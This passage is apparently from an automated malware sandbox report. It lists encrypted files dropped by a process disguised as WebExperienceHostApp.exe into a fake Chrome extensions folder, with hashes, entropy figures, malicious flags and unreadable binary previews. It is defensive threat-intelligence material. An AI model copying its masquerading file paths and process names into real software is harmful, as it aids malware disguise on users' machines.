SHA-512:	737320BCC7815FBC08F68C21403ED12C471A2F1042DC298FD0F3FBE2F7A691EC84CA8AD398321007FFABA485623B9BA1D0C21AC212E7EC1D9C5D421DF3680330
Malicious:	true
Preview:	...c....5 ..kZ..A\>Qe9J.:Pu...&..F..j9...q6.K./.....(....p...d..?'.....>..f..cp?:...cM...:B..1.g...[.U.......\.]...C.P^.........>U9...;V6..$..-...,.\|..!OC.\|r.....:.NR..TS....xj.o.6..H....4NWp.6..,.p.b.(.3.f....!l...}=.q.d..l.7../...%eF7....n..ck..-...........].!..u.FC..F....:..QeM.=C.....;....j.%m.5.....:J.\|..}..Q..(.s.S.~.6..;..._#.....d...c..G.B+\..<..K..u7.C..n.....pO..I,.{..%J....z.po...........ZH.r...C.yZ.X......r..o.......sMxM3.V.J.Y.!...$.y1....\bt...~.[..8......D..j..-.....zm.^.f.\Uh.%}..&G..X.."Xn..,%.lp...8...[q......_.+.<.u:=7..Ck8...\|.C........GEi%i...E.....F..W.,....hFk.s.)..Z.oB.Z.k.%.K..)&.QJ.....V.7N...1..w....LL...1.).7...JI.4...D.@t.%..V6Do4..RS...)$.u.........F...c....t..6v..........>...u..{.)w6..g..d.a.U...G8......i.P.Y..b..1`.0@.......6Q.b.Zi..pqH/.t49).y..L...T/.........C..E(rp.#..&4.'.R.D.&g...1.#X%..6.Q_5.#@..n.J.*.....L.(......U..J.......^.i.Z$h~7.....G.>M......r.%..y.C1.!.Rl1i.C..}...Hm.....xA`.~c......u:{

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.105

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34684
Entropy (8bit):	7.994905347328629
Encrypted:	true
SSDEEP:	768:4m6MPwIyqOxCrc/GJgepQwD1LqJHyRypeaO/2dBs5RDcjt+pFj6n:4hMII6xUSSgepQy10HuaOYIDcjtWjm
MD5:	C6A071F9E4EBBC40D788D9EE3EC7A701
SHA1:	A0909E50ED30C22DF700D12AA04852FA5EC35D50
SHA-256:	AA7B884110F01F236CE4E4BF71FFCFB5BFA529C5EB35148C724B57C63119F4BE
SHA-512:	CAA6D307DCC6CB3B0B38AA3A7AE3ED7AA9B6CBBE41563798558C2908C2DE31A90914F95237815E2D8F87205EFE5AA469768CD84488015F60C18861F93494B39D
Malicious:	true
Preview:	{.4.-L.........+..N8.....>.8S;&.B.H.I<...Dn=.....i...c........`..M..m...d.~ ........k..y.fS.)..!.-"..8...>$...A.......I.2........X....\|7&".....M..k@..Bw.....m._&.Y...9.<..U.5.........1..bB...F...2..c~...\Q"<.~...L...\|.x......K..j.:PH.,...Z.j.b.0..e.J.3R?..~.W-R?...h"..K.5..t.d.}Ak....I..,.~.....D.q6..>N....e.N.c..j../D..a.......x7...0.Y.2..Q.2.....I.....$H.8.\.r....D......^.L2..\|.x._.Bu..a>4'Q%.b<.r...h..J..u..h.V....."2.gH.....w.........o....ve....a..j..=a6...cE%..0.:jMU.;..C_N....Mb...Y......KA.VN).Lr..Dasa. .7..........N.uWHy. ..w2......."nA..K.Z....I.m.&)A..E...K4.E..x..wH48....#.............2./.F8./&[.."....s&.@D.:a..A....;.4...D.M4#.ys.....Q#...-..2.9DB.A2..I....H..$.L........Kp.....T,G`.A.%...... ..B.B.....^.......oZ.a.#A.m.. ..E.:`...U....G.....U...W.#.cL;-.i:G:%.$1G..B.w<by.......4.......n.i.Q.....~..L..i....-UH0."6..9i..J...o.5a..:..x$.....d^..P.Z...&Yc.O.....u..@;..~.......E`<.......^j..<...M.8...JB.y....>..v:......'.V...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.106

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98056
Entropy (8bit):	7.998167444715926
Encrypted:	true
SSDEEP:	1536:5NfB96QKArtmwedP4QnzFeZgFGdKkPRuvMvMcBXxyOvAo41sEfyVoz32ervKNMR3:5Nfj/nJ5eiwxIfkkQvMvMcBBPX41RfyC
MD5:	D3CF1EB7E9041D68473E89B6602DB0A5
SHA1:	630D2557D2D6E4A247347DCF23D0922E7B88B0EE
SHA-256:	C4B853D65370A1075C03CBEFA43F9B13F75D6A6CF4B525A2C418B3678D3A703A
SHA-512:	6CB9BAB03A2328ADCE5FE8994B78DBFE088A0B473506AD3FB23E07071CD4043A313DF91EEAF1D825C57A3E8D7FFBE8702EA216A4184F7BC329F4F961CBC7E420
Malicious:	true
Preview:	..p..... .<..pR.~....O ..kt...l.x.K.....f.M....W.......9..k..x.x#..;.UK.r.Q...O...l.F..W.\|.PU..b.WLP...S .....l..o..?..>e.4t.YY..;\|.....Krx...$..'!D.GT.V:.R.\|.c\ .y..CQ9.J:._..M]L.L?.....F...q...ub.#b+.&'{>O....\|K2N'b...eG.Z\..k..iq...R.)U.....R...f.!S....A....tx..pcT.`w.22'........7f...Yu\|$...?.......Nii.....bL.2...Cfe>..}..V.F..^MKv.......qb... ... ...$8X..t5..vs..N...4.w.on.[..eJ..P..n.}..-.f.}6e...Os...Kf....R-Br..y..[L..\|..<.Z......G7\.!q~.#....[..V.o...N..S.n..M..0Y.{.>...5...f.Fh....d...u}N.0......../&.j=uK.I..(j.z..`.L..Z.c.~...t.".>&.j.?..Q.X#\|~...".Sv. h\|.9y.5.".F6.H.g.X.u.\|.g./...A.i...Z.l.\...T.~..Y...E.$}...fh..iC..}..-bM.....GjV...Yt...J...4...N...v.#l....s.H.=1.K./]..0.w.2..3....k...%AN5P.HQ...;.qpz....C.q.....K(....'.2....^...Q.f.....'...w..n..G.......J...Y.Q8...%.-..p....C&.,....w.n...]CN.....[..!...p..z...2bg>:..M..w.......#...6......y.z.2_..;{,......>8L.s..R ..TUsNG...."...K...yU.m..l-..R...dEX..kL..?.oaR3...u

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.107

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34684
Entropy (8bit):	7.995168454589623
Encrypted:	true
SSDEEP:	768:tpip6syW/aY8470KOXOgKSeSgnuSSE+nPoeNJFc:tJVWW+zSetuq+PRJG
MD5:	8CF4D3AA8024D528D346BBFCD432E596
SHA1:	A36BE219C6C48EEEA519C1995A3174CE9DBD153C
SHA-256:	BF356B2BDB4DA5A8282F418B0BAD391067969B6FD80D2954810D817253355D9B
SHA-512:	1FF0D1AD81519C678B612E4022E91B554EA67D13A00E6CB54FEA09E96793543A31BCF388B9406AA80A2D7BB77988642C8629BA638A1BDA1CADA882EEC1E06A5B
Malicious:	true
Preview:	!R[..h.B..N..Y.A...qAY].....\|..0..]@....;..{d;.d...PS.......hRs{..>.HF.6F #[..ZKB2..p.)Dj.s....F...o..4n.#.N....G.e>..b....+.GH.\.H.p4r...4..........B2... .n.Je...DE..9.(au.j.x.R.:..FIK...#..W..-...Q......KG=}.4..w.."..c..s....}.4.....90..3..k.Je.i6.\|.:...o..B(...\|...NN.!mD.....L.-.bJ.L3Qz......[......Vr(9...B.F..d..S.x!~19..?n...)F.. /....V..8..;.....9....5\|C.....D.Y...A<..V....R.........i..........H..!..i......?S..Cm%..X!O...u[..>..l.....\|.8 .B.4...K.)....nWh..g..4>.......U.y..%L`...".x..7...GJ.........t.'.@^.&..~w."...+t.<..._."`-.U...]....S...............@<...xe.wr..5Ff.W..q....1..."...9.[P 0.Nn.q..D%....G`1).oA.f.5t..~.6...x.L'..^EY.."....!-QN..r..d.(....F..AC.......G<.~.eS....Ru......n.c.../ 3.@...&...7.....O.9*1(4.)xu...(.fV....SK.(QE.6.:6j.B.d=.1..B..../.H........[.._f...`...K...........3E..CK.Mj..:b.Ip...o&@..1.(x..i!.i.,...1..."..9.;.]J....>.A.U.x?O.u....j..9T....w..U/.w/.7..,.lp..1!,h..y3.4.~.@/..{....A.....b....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.108

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	8404
Entropy (8bit):	7.978169844008558
Encrypted:	false
SSDEEP:	192:IF0nPmdKIk/OAKGPfS+ppT6brkQxYZaKmvNflfD7mdmSHNiIdwUO9mEj:5+dKnOrGPfSopT3TmvNflfDyLTO99j
MD5:	40B175B73BA17213FC66C841611287FD
SHA1:	AD2BAF9F8C6A15085AA450BC8FF5BD3389C4BFAA
SHA-256:	50DBCCC08F41A0147AB2CC1E2E4DA1B7A1A95B50B7D641193714E37B2F286F32
SHA-512:	0996675ECC2D2B02F68885DF0330E8AC37CC9154E46405D54D3841749507B36D401ABA782988D1EFD805A24997AB6F2DD5D8D50044CB5AA1C881C5235AFAF60A
Malicious:	false
Preview:	....V.....1.r..zO.....m.v1.l4.>....4..........d...T..5..l...m...lN8.v=C.......]..?..+v)^.~.7.a..6...%.Qf.....[..^u.r.D.7.......j......}@&.v....M.Z....}6...Op.. $....@igD`Q.".in...4.>s..;.....i....{..........r.....G.V...>..=....0i..h....5.m.....;0.0=2.."n..l.....7..B..{.HU...-.A...:.G.....\|.2....6.....9...?.......%......'1.."..#x..36..0k..s..R.K!....].................s..}.....9H...w.[.. J..[... ...S"..._.f.......<X.;.w.y.}....{...O>.M.&ow...[.u...@S,..F-.....5......0......c...-..i.t...%.......,83...c.ad.....t..W\|....w...._.......>.....6.....a...[jl"......o....Z......q...Gz!n.'.\.Z6,.kdc>.......W...T.7.?. .Pe\|`.i....`.E.R.j..7..`[.....8.p....04....;2Z.,.Q.f~/..T....7...1UD..k..DH....?3K...V..y.....k.....p.?O~....#..K./m7.S...,."...Q...(Xbp._#...`k_:KN..-.:......^Xcn.7..G..:...Q......F!TE.E.c....}pux.C..j..b...p..o.9.H.!...2...\|=.*PL?.!..#.@.H..X........ii[@.....3...f.\....^...... =LKI7..p.1.....?......0....$....SA...y.70.p..$......M.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.109

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	96884
Entropy (8bit):	7.998298845368549
Encrypted:	true
SSDEEP:	1536:1pGSEGGRz58GNaNft+tGlLxMwvFFoSr0ptR0d/iJnJQLz9HaOM:1pn/Gt58Geft+tGNCmFRdiJpOM
MD5:	149E13F368075782140E3E1D6DA50CBD
SHA1:	8779406F7BFC4ECE79A6F90CE2DD0B075A084C16
SHA-256:	7F6A9450C3A336173D30B97F9E530760262BE74BEF494D9CADB0D9849CC2DF88
SHA-512:	C477C8682934A27DC9E099DD015708CF34392977B5CE56C70F6ABBA8BD019093FF9C8D53BB9E5FA316D718154F9A3A4688149E0B12186549D51CB3A928F71529
Malicious:	true
Preview:	.!>...{.......4?W..E..+.<.V...7<@D.]....SM.7.Ez.T.G...q......z.)....L.\U..v=+_.....Z.l.bs?M..ea".Lwm...}..F.j.....F..E..K..N...^..\|.6.a.@K]N...Q......7.I'..>o....].(S...A..+%[..i.....M.x....[;.E.J..b..~..(_.........?H(D$....um.@[Mt..z...'g+wF'i.=...,......F.jx.V.qc.....K...)%O...\|hCd.Ht...=.W......<;y>H..1.c....>t...qR..t.8A.-M.:..P.q.M."'.!.{..B.r..!Z......_...b.f..0..E.>-......W....R...K..1.}.N...^wF}4\|.H?............?8>..~0..r...t.......a\{.o?#:.S:o....E.a.>....O...oT.aU.....:I.Qv...n>.....m.G....I.....S5>X.a......C%&...&..x..f.+UD....`.....?...P..........&7.C6..2:.h......AX..v..7...`.?E..8A..\|...g..6\...&......f....0.,T.Z..sU..B.[..}p.Y..&.l.D:.......>.....)-....m6[...k../J..1......../...>...J...-.w.%B...f..l}..2..9L;.N).T..D.y../u#}.....zF.`...}.U.'1af..."".....N..by..Q.....Y....X..L........P..im..O..lv...}....q._F3$....=.QB...-SS...x..N....x....8....s..M4.2.r.........."..{X..4.q...I-N.bO5+...'.T.Z.qj.Q.^T.8....I.T..7T..b}......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.11

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	30266
Entropy (8bit):	7.994046482138979
Encrypted:	true
SSDEEP:	768:3IDNXI5O2qKR8Jy0xs6551vHEM2pMg3sjqi9:3c5lKR8ZD5TvHEPm9
MD5:	4BC9390003135993497C35E68F293E72
SHA1:	D1A40B3E0D8EC6C7E4BAFDE2EB68FEA80815FFE8
SHA-256:	817E3100FD0C68830124638535BC55D07A7B013D405BF3E998B9CFEC1DE983CE
SHA-512:	24EA981EB3952FB0D2C1AA53A41DE8955671EAD95229045F1198E0AD2D8EB14EE555E50E70DC991331DD38E0C24611E7B91F32095450D0811C69FAF287E903BD
Malicious:	true
Preview:	.L..\|@.........S.....s.L../.i.,elw..G....".X...H..........S,.Ia.h.k.....MTR......+...[Kb..k..cg.:........J..~.....Th.....x.._.>....#I.@.>b...&./...._.=..(....\|...8#."....W..$....7L._l..x(+_rZ...Q...?z...8.....+.+.#+.....]-..........Q.22;..[`..N9......p...cK....G..N..[.,.D.c...l.O...........\|M5.0.#y:...G......=K..~]m..y.}e.'.....(.$.k.5m.+...;7l.d..G$......m....mZ).X.%.......u...QX...9k.v..{.....z....F.V(\|}HK.2`k...JVJ...7HP....P....r..Tf..}..x=..........-$.?...wJ..}{~../.8G........~..u.YP.c..j.v..6qn......a...g7..m..h...w.r..\|...:..vz^jp.1...vG..9..9.R.....e..>..S.....$C.}...s..i..63. j...#.t...7......9U.`.."...R.<{.\..'s..`...xRQcpk...x...J}.8...B).............Q^.C.U......v.B..1..m.d.]...:MG..."..$.Y.~N]..)l..HK.....e..2"kK{._....P..09....H...Y..i....:>0~.........jN`.G,.......]..`....{_..fM..}...).?..g.....bM..!.1.@..........?.nK..~....7..{...h....m..Q.,.`...&. .30....M.G"........w..}.r..KO.t.q.........L....;X...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.110

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	50153
Entropy (8bit):	7.996108103884875
Encrypted:	true
SSDEEP:	768:Q9B9iK7f1ZxocOwYOXzKCAFaTrhkn4gZ4Cm2soKVibTFagIKjCagea:a9iKD1vot8XLBhi3ZKFibxrpI7
MD5:	33B7F5B8E0ED698E32D0E594D9114F0F
SHA1:	4E85F72F715764F51C623FBC85894467F9FA57BD
SHA-256:	1572B0C05ACCE85F830727C44B6EF6634A3DCC3817406F9A59C732A3D22A9F98
SHA-512:	3EDE5E0EF097E05DBAA0F5B115DBDFB333960EBC83BEF10F97AE8C870C05FA172F71E61FD16F0212F01B4D08BE0F4979A57F1D4428718CF94DF918B8BABC02BE
Malicious:	true
Preview:	..GQ.T.Qu.6.u....{...e..u[.!....4.......;E...f...6.......}.%.xF....u. .Mm..$]..L...S...<...\P..d)...Y},.:8.A,....Q...vL%.X<...8.s.U.5x.eao.B.#.a+.QD]).<...Eq.c{...]0.q.F.p....TfjOO..=..i....,.H.=..gF..:.I...\|............3...o.@3....M...".b..v....~....j.d .!...1..UE..1....!.7.0~.t.[N/.,..8<m].E..,.N.u.hK}x..rAx.<p9.9...d.......&>u.=....[.....O..F{.....b=.......{.w.=.%N..ck@V_..\|l.d/.eJ+7/8.....U.B..3.JK...O\,.U.~BR.+.L.......Ga.........1.E.F_...1r.H.0.E.K.s.B.,..J............].!F.o.....6...oy#3.`I... .,z.c.#.O.....}..S,.ip.*h$%...v~z......@s.K.2...h"d..9.:g.....Y+.1W..)L.<4!.(.[E8x.w9...:...L....\..rj..<..W...1E.]m;S-W......5.....;.....i..@..N...T.C..1...T.f.........\|...;.!}PV...1... u...p.D.\|........0}._.,P.e.......,.El....!\..?...~$U....iL.._q]...04'N.\..[0.u.].....<.e...qCd........R..m%'.?.)U...m...u.....Q%.lrm..]..B....E..=...^Yq+........?...b..,1....@.{..IN...L....../L...H...Df.r........!i.=1T......5^.......d.q......@......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.111

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	159430
Entropy (8bit):	7.998674900992916
Encrypted:	true
SSDEEP:	3072:67nd8ai/g9PNcK4iz+Aoe1YEKphabflcMGv9XmAoPsD/hVtNPEdHwnWwmr:qQ/waKBapuYEGEBHGv9r5/PtNPoQnWwy
MD5:	D2FFF6AF06A171F2F1C6276F28194969
SHA1:	96F62CAFAA6F1AED8C9D52FC45AD450671D387CF
SHA-256:	8C66468BFEA7DA7137B617D5FC554993F1D2170C81FC749359457DD4035545DB
SHA-512:	F4CC51E16F511423CF0B3D3995D4537F477E28A6985B1E34133088FB30A4A123379DE103C2C7344EF7776505D6EF27462E592A0D8741D98346E4DEF46E104228
Malicious:	true
Preview:	=H.BG<r..........V>+.zr.n......=.A..H"1....J.C.:..8w.d.G..a..w.YB.}.,'..bc..T%6.Fl.G,......w.L'rV.3. .+S..[....\..jWG..t.....d#9......b..Tq;...(....[:.!x.{..9..w.t.....5..........X....U...,FBW....W`.....Qb@.E.?<....Ms.".-..!w.....V.To.....?E..E..Ys....,].....bZ.]Y.?.x..xy..by?yhS.^..~2..IS..'....o....#L.LJ5...'.l. &..g.PJ....4..ye.:..-ZF..)....r...PV/...wD...:.`...xC........#..%..t.....j....^.$_..j..z....0.@?.6.v.h....5d...1.n.K....UB...T........@..(6...,cH... ..Y.4.....U2..-.T...A..].&..h U>/.W:.j1R..:....A..qz...........X].S.....y.'9.F.u.....P(f"..!........"X....\....hS7.....Y..s,..M.UU'......UA..$.oUo....H..+...g..vDA.`.I-.....=.EG..s.....}C/..`E.....3M."p...o.......x+. ........5...z......,K..>...RX......S{..uX9b.`....Q.x......5..`.....N..!s#..IO..xf.H\.Q.Y....k.\.NK...M..J.&E..XD/..a mv...8.B3.F..-.x(.u...j....nW.N...(.PM...g..3]...8RQ...g..... \..._.=...8D.q.[.[.OiE@tY'.....c%!..N:.....g....\S....9.s....v.....Y{}.;......}m..=.I

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.112

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	94418
Entropy (8bit):	7.997798184782707
Encrypted:	true
SSDEEP:	1536:mDAghOmFuBOh88Kw7EnH6VFmCDDIKCzfjR4XgL0Eu7A94DjQPIqPBLc19w5q8:mDAxLBOh8DdanmCDkKCzfjeXUe704Dje
MD5:	246BB6C39970DDB52E37F5FF55CD456A
SHA1:	D5AC3DC2E68A79339B35656D2067B238F2CC58BC
SHA-256:	BF91AA95EFD728F7F52704C21DBA03AD0E74566596EFFCFB540082E9EA29B811
SHA-512:	F5C72BA579A52B1709325C88FE4486AC15CD53475D2FD68E829D52C7524546AEF5F627DF7650E364D9AC2E3088CB79F4372F315BB5EF15E7D7240AC220CB7FDD
Malicious:	true
Preview:	...d/.n..\.C...`..I.x%[tt.f.r.y#x8b.m.z.E..+T..j.X.@,..I.......QC......V..e..\|V.4n..-....4...5..\x..#.5 nU'?.;Y..u.......b.2m.d....{...e...g...........&...].}.a...Id. ....8.K...U..`.b.....g..HM..O..~...V....3........7...<0...\|%D.0.1.t......._I.%Y..N..nL........Yz...6...F..=...1.x.b..0T.QM..+..v..L.%l..7..tn...7..E..d..q......t.p.u03.t....q..2..M..}..$.&.!.....\|..z"7[...I.......k.Qk)............q.....C...'2}.......7.H....Q?..ZPg%)mK...9...o...+4....'..D..?.:u...@..7?..........Q)...RV.Zs....{........w..M....f5..8g.v......I......,.5 ..w.g.<>7_q..'.+..!..V.......=....n..}.k.%.`.d..c..1..R.$.&..3.7...\|..J$'.\....X.....{..`qN.........$..4...Y..e.V.A....Q...WHo......G?...O.a. _A....k.-.....@-.>.: Z..M.v.tF.^..y...F.#.N+@.J...<.F[s..ak..MEd..(.....M.G.>.......G{.r&...?.........L&"......U.<\|1.....[kh...:? J.o........)...1.OS...-.&Y...-ep.....q..X.&P.......S.@.....d...So..F.uq=.HT...J.t....a....=.....o...*.......r..Y.\{.E.9.z^......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.113

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	96208
Entropy (8bit):	7.997915607079107
Encrypted:	true
SSDEEP:	1536:Xgm8H4M0ME5sPUM/JUYK5NeDVQozeD188b1eOeoFDlKfT8ZSN3EU2Wx3:wBbBnxwgVQozPDMW8INUU2W1
MD5:	123FB8F30949590BBFB7C7B84E9DE627
SHA1:	9A006D3731EADA372636B29FBAB6D420FCF03482
SHA-256:	EA96BFD53FEFF54E9F6B6C2F70F0967DE1BBD6D246055E66DFF0793DD29BAB1F
SHA-512:	40A25D3798C213CA452788560D9B736219A1B9C9098393283C22847ED56391D7785E9C75022D9DC0462FDBE139E75C36687B0ABCE15B28C8B5D44B577EE60401
Malicious:	true
Preview:	Z.uW_...u..#\.`V..8u..E......N...\|...u!7..%p......5.>.<."m.....h...C.rh..K-........c...C}...4I.'^..AW..?....h`...H.....R..}....c....~+.3x.....b..D(....G.......<E..ul$f..cn.....g..#..E~.n../.>.[........mkg.9.E....N...B...F..O..II)..t.D.....2..DO..:.&.u......gfH.....X.(.M..t.m~....hS....ZB.{.....B...%..`.=T......_.Q..F.j..C$..9y.0..L...........2l~..jA...OC.qpGd..T....K\......HI.........=...@..Z..'Hk..l?].....u<.P....B%...:... \|.r.dk..r.3[D..Jx.p.......6.K..mT..H..{>.O.B.w@-G... ....%fk.....G..9.z.......E..$.lz..h...A.EL...G..W..~..P..<Y%.Jxt...{.:..z;~...1.02....o.m/...%.A...(#.V.}B....2.Z6........G..E/..Dw......%FX.. 11'....~.L..m...B.0.a.(...t&o.Sx..^..;h#u.;.OtC.]./V....I.7;O.n=..8?..M..T.[..Ww.O.......c7.`...E.e.R.a...]ZQ.m......W..G.T.37\|G.kc...Z..D.TX...'.T...v........%.u....F..19..=x.V8_?..$...V...........nM..\..]Z...`...u.=...)}....>.].OM...JS..A.<..D.N..u..*(@..`I.)..Z.o.s.{I5...[...y....z..a......QQ.m

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.114

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	33415
Entropy (8bit):	7.994204014731013
Encrypted:	true
SSDEEP:	768:MTLFPNOvGH00iutaENLfJSVwl7yt4HypFxKsRJfdDzM:MTLFPo7u1Nws+/p5RxdDo
MD5:	AF4BB56B8867BBC361CC749FEF37AA0D
SHA1:	0E840EAF14CDD907AD26420655717B7A92EBE735
SHA-256:	17C1A997EC99FA547AF76966DBE4A90CA7939D0E02F068E7E30F842FC046404C
SHA-512:	EBE0510A5A89EA6F97305A4C6C67C2EE136480D6635350B4C61782352AB354BBEE4C0E10E31ADDCF10E51C4A0001ECCD2E2DCF2B7D23D50AB715FF8B9AA6151B
Malicious:	true
Preview:	...X'G..G.......t.....1..h...%.b.....'....-...b...)0..F...S..h...aBh.g[...,jPZHlc#.......F.7Ir.=....[..{..G.....\|.)..FU....M.........BG.\| .. {9o.qt.hM".<.....p,..(2.j\..7....B.[.?&..zu.......}_...p8...2.-..v...8eVp...@........~`..@.Z.Y....M..o....X.R...M.-..~..R.....=.....~.r.B?8..@.i..S..RW..g.hz2h.6..4Hj.......i.{...`....q.m..G...._..9.....'.>.;X..eu...m...L.@_....zu..w..d0.....4...'..d>.S.?...Z..&K.,.i......C.I.)y>^...!uqi.!l)..@.C/.E`.D..UZ.SYI....Zk..5 z.3.....).EMx..x.@.....P.w...-._l.;h2}.lk[..>..N_.'..LQ....m..ks....W8.........~.'.m../.f.r:.$u.r...uf)A.....\9Q..Y..X......J...........N..<..l...5..%6>S:...p..V.........A.4..d. ..[..b.......:kbF.L.Z9..a...8..po..:..8.q2.5.&b.#x.CSW.+. qY..l..X...3.......)...@C.lU]...Tz..P.kw%..`s....=4x$Q.\|.<..s........L..'.....J...P.Z..J?..'B>S.r.O.........6U<..O/.....?.k8.W~....'".o........ ..Q.k...1...\;vG...\|BP..:......3..s..._Ia%L..1.{..^.1\|.+..W}w.......`l...)(%..^..$...........$d9..w.P,.,t

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.115

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	84571
Entropy (8bit):	7.997608030604283
Encrypted:	true
SSDEEP:	1536:RbyvD7uQ4jQIvcsn8n33vWMclNTyyKv3AiSWnqhnwLZXSKomDL6UwwiqS929Aw:9yPaj3nZNl5KvzjnwnwLZXSKoS+jqSQB
MD5:	1807001C5F0279DA5ABC482CF0F656A4
SHA1:	5D4A2CF0DC4B0C2A2522C7742B7C96DB6CB76929
SHA-256:	0BDFBF7449A6207CAEFAE9879AD579D195000D9AC535D43F0B6730C869B07473
SHA-512:	93D08CEEE3C7FF2606ED4040D577AF373D219CDCF4FBEF8864441253D971ADCE4D4ADF4A7683C16A33D3DD843AF7A3AB75842343C2361C7E8E6D3DEEF06D91AF
Malicious:	true
Preview:	t}.u.E)..'.:."#I....( kC...+......[...+......k.>.....d...w...v.Gx.u...A...D..".........CH...../.Rs.bz<.r.\...$4HY%.W..s..I.............J.....&.O.'..<.....\.^.[..5....A...8..;...{...5.nI..}...I........nC.M.V....K8.q`...>8.Tk.......Oy.YM?...........J....~.{....._..I....q..G....d.6.O..p...[..NOD............)?.J..K..X..l%.='!..Zc)....p.._DE...<......H5.....zj8,_...C.Te_-6.V..sto-....XN^..A....f..U.a2.~......(&..I.6.D..h....$....X.qq......]Ws....L.C\......r.k.....?.../..g.9...{.=...M..3.%.&.a3..JJ....B....Y..t..........j.G.M2..........TF._s....B....IKI...k3l8K..X..........A.w..... .#Q....v.@.......&CK....@3.r...2.....m...v}..YWQ.%.c.@P.y.6'....+%a.1.y....e...k.5.2&l.+c.`..'.C.2........f.S.HKr..f.8n%E>.....)......P...4.3Bs.?.D..`...KT.d.sQ...f[.....^......rj.J0=.qr........b..$....."}....sY.z...9k.....]o.\|.....N.~.g...M=.1..SC....}[..q{&....S9..l]..........!.~..A..>.-.:A....Cnf.fN.\..\..K.>%-......83.Ge.?..@.\.."..*$....^.K`..7..A..v......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.116

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	27600
Entropy (8bit):	7.9941388261049005
Encrypted:	true
SSDEEP:	768:un8Rt9T7KMJPmDMhBmuTWZHsCv+OUmy7Wy23vwJB4I:vpBUYhBmuSKCvuFCyPJBL
MD5:	497F07BEC30357EE2256AD488799F2B9
SHA1:	6FF4C0CB541E40CC38900737770BF176901E70CD
SHA-256:	387FAD25299AE2DA33C5D0AC47C4EFF388A0591693996AEED2610407F6B1B9DB
SHA-512:	749916379365AF5AC6E0FC3F560EC5879986EEF29B2E0947BCC2A69D575BB950CDCC93F35D7FD4A7DF180C848925DD6067701A6EF5BEAB4CDC63D44F1C05EFDA
Malicious:	true
Preview:	e...6..7. ...L.u.O...0.Q..0!..O.z......[,.-S_..]..2AXf]..gE.SeF:R....ji.... .............l...s.........Myp.e]...j..z:...Y...P..;S,.8h\|B/._-&5>B..d.3]...k..y..D...........F.S..T&/..U.../Q.\)..../..R..1Rs.......K5SS.QR...y.8../\|~Tn$j.....z....r.\|.....L..`o@.(.e.D...9.;.(.$w.O.3...N...L.........u. X..$.A....}.....0O.._d!.2..I.^.b:~.qJu.`.E.Nv..4nI-...!..#..fc..b?..i.Me.rE.h...0..+.`...]...]4.`.W..r.S-.t<..+:.......:?Wv...0.....(.r......g.K....../...{......g.....$......s^.Q6N...... \e.M.3....R(.T.....,.>.ZZ.n>.,.s.A.4d.s..%.o......y.%T.'..3f$x^yC..17....=...Yp.....7O.x.n.. .,...w....!Z.....>Z.8....).Te.#Xnl..i.\|....+j..P.`p.Y....q......A.?.....E......1V....z..3..G.XouV..Y......$.F.?c....L?U...'..)...N....R1.%....}..V..`..z.d..0....6.#.5..Lwz.3..>..P..L7._.$C(w....-.W...i.b.....c.;O.......'....@.).p..._.....u.YL6.k/.-.{.<Nf.p.ij..m.<O!u."..!zj.[..P..f?...C&tbM..i..}.$KG../t6...6...?....j.x..K.6.=.]O.-...X.4..~.}..\|./._<.....L.HUvXU.8....^..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.117

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99619
Entropy (8bit):	7.998358713854593
Encrypted:	true
SSDEEP:	1536:m9ObUyqUwE/q9HJXFhWhGNWr4n/ylyFGjXuzYnN9bzjuW2/nZHepyNxq6ZdEiV:wWUSq9HHh0GYHlyAXuyN9bzju8QxFdJV
MD5:	E6181E6EBB5F37D2442A12C5CDCB3BD8
SHA1:	411FD337139EA9A90860C4364699B239C2064D71
SHA-256:	22C5836D7EA401BCF86D1DE32ADE4E3981EEB9FF9FEF74F9212F82AAF9B4FCD2
SHA-512:	DAF528A41241A46D377F30A24C1895A934BFC2FB4C11CDF431D274A485A5633FF0FBA2A733C59C84920E841B932DE19F9D53D4EC810E1511248D705BAF6AE4D9
